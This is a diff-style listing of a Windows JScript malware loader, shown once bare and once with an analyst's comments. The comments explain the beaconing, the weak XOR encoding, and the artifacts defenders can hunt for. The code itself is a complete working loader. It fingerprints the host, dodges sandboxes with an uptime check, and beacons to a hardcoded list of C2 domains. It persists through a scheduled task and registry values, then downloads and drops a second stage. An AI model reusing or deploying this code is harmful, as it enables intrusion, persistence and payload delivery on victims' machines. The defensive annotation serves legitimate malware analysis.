- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- // Encoding helpers shared by the beacon and the response handling.
- var DataTools = {};
- // Seed value for DeriveKey.
- DataTools.KEY_BASE = 1029;
- // Reduces keyStr to one small integer: XOR every char code into KEY_BASE,
- // then sum the decimal digits of the result. The output space is tiny (a
- // digit sum of a short number), so traffic obfuscated by RotString with this
- // key can be recovered from a capture by trying every candidate key.
- // Note: the loop index i is shared by both loops (var hoisting).
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- // XORs every UTF-16 code unit of str with the integer key and returns the
- // result as a string. The operation is symmetric, so the same call decodes.
- // Applied to both the outgoing beacon body and the C2 responses (see Loader).
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- // 32-bit multiplicative string hash (seed 0xdeadbeef, multiplier 2654435761,
- // final mix h ^ h>>>16), returned as a lowercase hex string without
- // zero-padding. Depends on the Math.imul replacement above. Used to build
- // the per-host identifier in Loader.GetUid.
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- // Pseudo-random helpers built on Math.random (not cryptographic). Their
- // output is only used to vary request URLs and to fill the decoy file.
- DataTools.Random = {};
- // Uniform integer in [min, max], both ends inclusive after rounding.
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- // len characters drawn from lowercase ASCII letters only (no digits, no
- // upper case), which makes the generated query-string values recognisable
- // in proxy logs.
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- // Fills %key% placeholders in str from a "key=value&key2=value2" string.
- // String.replace is called with a string pattern, so only the first
- // occurrence of each placeholder is substituted, and a value containing
- // '&' or '=' would be split. Returns the substituted string.
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- // Thin wrappers around WScript.Shell and Scripting.FileSystemObject. Every
- // process launch, registry write and file write in the sample goes through
- // these, so process-creation, registry and file telemetry on the script host
- // process is where the activity surfaces.
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- // Launches command via WScript.Shell.Run (child process of the script host).
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- // Expands an %ENV% string.
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- // Reads an absolute registry path.
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- // Writes value under GlobalStrings.REG_ROOT + entry; entry is always
- // relative to that root.
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- // Creates/overwrites path with a single line of 1024 random letters — a
- // filler file (used with NTFILE_PATH in Persist). The 2nd/3rd CreateTextFile
- // arguments are FSO's overwrite and unicode flags.
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- // Writes data as a line into "path:stream", i.e. an NTFS alternate data
- // stream. Not referenced elsewhere in this listing.
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- // Saves an ADODB stream into the alternate data stream "path:stream" and
- // closes it. Identical to WriteDataStreamBytes; neither is referenced
- // elsewhere in this listing.
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- // Overwrites path with the text data (second CreateTextFile argument is the
- // overwrite flag).
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- // Saves an ADODB stream to path (overwrite) and closes it. Used by
- // DeployHost for the downloaded second stage.
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- // Same as AppendDataStreamB.
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- // Returns the whole file as text. The handle is never closed.
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- // WMI root\cimv2 namespace on pcname via a GetObject moniker.
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- // SystemUpTime of the local host from Win32_PerfFormattedData_PerfOS_System
- // (presumably seconds). Any failure — WMI unavailable, empty result — yields
- // 0, which DeployClient treats as "host too young" and exits on.
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- // Despite the name this does not inspect the CPU/OS architecture: it returns
- // "32" only when the ProductName registry value contains 'Windows 7' and
- // "64" otherwise. Sent to the C2 as the rtag parameter in DeployHost.
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- // One shared MSXML2.XMLHTTP instance, reused for every request.
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- // Blocking GET of url. Returns the response body on HTTP 200; a non-200
- // status and any exception both return "", so callers cannot tell an empty
- // body from a failed connection.
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- // Host fingerprint, collected once at load time from environment variables
- // and WMI and later sent to the C2.
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- // "true" when the computer name differs from the user domain — presumably a
- // heuristic for "domain-joined" (on a workgroup host the two usually match).
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- // Deterministic per-host identifier: Hash of the fingerprint fields plus
- // version and campaign tag, with SOFT_VERSION appended by string
- // concatenation (Hash returns a string). The same value is stored in the
- // registry (SetupServiceKey), keyed into response decoding and used as the
- // second-stage filename in %temp%.
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- // Builds the beacon payload: fingerprint fields joined with ':', XOR-encoded
- // with DeriveKey(nonce + C2_OB_KEY), base64-encoded, then URL-encoded.
- // The nonce travels in the clear in the same URL (see GetInitialEndpoint), so
- // the key, and therefore the payload, is recoverable from a captured request.
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- // Beacon path and query string. Only the encoded payload and the nonce
- // (ubwG) carry information; client and service_id are random filler.
- // NOTE(review): the "®clid" fragment is most likely a paste-rendering artifact
- // of "&regclid" (the HTML entity &reg decoded to ®), so the parameter name
- // on the wire is presumably regclid — confirm against a real capture before
- // using it in a network signature.
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- // Fetches the second stage from SELECTED_C2/go.aspx, identifying the host by
- // the XOR+base64-encoded uid and the GetArch() value (rtag). The body is
- // XOR-decoded with DeriveKey(uid + C2_OB_KEY), base64-decoded to bytes and
- // saved as %temp%\<uid>.bin; that path is returned. Http.Request already
- // swallows errors, so an empty body presumably still produces a file.
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- // Entry point when the script runs standalone. Exits immediately if the
- // reported uptime is 3000 or less (presumably seconds, i.e. roughly the first
- // 50 minutes after boot) — and also when GetUptime failed, since that returns
- // 0 — a gate that short-lived analysis environments typically fail. Then makes
- // up to C2_FAIL_COUNT passes over PRIMARY_C2: GET the beacon, XOR-decode the
- // body with the uid-derived key, and if the '<<<CLIENT__' marker is present
- // strip it, base64-decode the remainder, record the responding host (ShimV4)
- // and the uid (SetupServiceKey) under REG_ROOT, select that host for
- // DeployHost and hand the decoded script to Persist. Every exception is
- // swallowed; the sleep runs after each host regardless of outcome.
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- // Establishes persistence and drops the received client script. In order:
- // registers a scheduled task named TASK_NAME that runs PERSIST_COMMAND every
- // 6 minutes (TASK_LOOP_CREATE with timeout=6); stores the decoded client as
- // ServerUrl and this script's own source (WScript.ScriptFullName) as WebLib32
- // under REG_ROOT — presumably so the dropped script can load it from the
- // registry later; writes the random filler file at NTFILE_PATH; writes the
- // client to C:\Users\Public\Disk0.js (the file PERSIST_COMMAND launches);
- // then fetches the second stage via DeployHost. The schtasks execution, the
- // two Public-folder files and the REG_ROOT values are the artifacts to hunt
- // for on a suspected host.
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- // Shows message in a WScript.Shell popup. Not referenced elsewhere in this
- // listing (a leftover development helper).
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- // Decodes a base64 string to text: the bytes are obtained through an MSXML
- // element with dataType bin.Base64, written into a binary ADODB stream, and
- // read back as UTF-8 text. Instantiates its COM objects directly rather than
- // through ObjectProducer.
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- // Converts text to a binary (byte array) value via an ADODB stream using the
- // "ascii" charset, so non-ASCII characters do not survive the round trip.
- // Used by Base64Encode.
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- // Decodes a base64 string into an open binary ADODB stream and returns the
- // stream itself (Position is not reset). The caller — Windows.WriteBytes in
- // DeployHost — saves it to disk and closes it.
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- // Base64-encodes text via StringToBinary and an MSXML bin.base64 element.
- // Strips the newlines MSXML inserts, and also removes every "//" sequence
- // from the output — that second replace alters legitimate base64 content, so
- // the receiving side presumably tolerates or expects the mangled form.
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- // Runs the beacon only when CLIENT_IMPORT_ENV is undefined, i.e. when this
- // file is executed as a standalone script. A host that defines that variable
- // before evaluating this source presumably gets the helper objects above
- // (Windows, DataTools, Loader, ...) without triggering DeployClient.
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }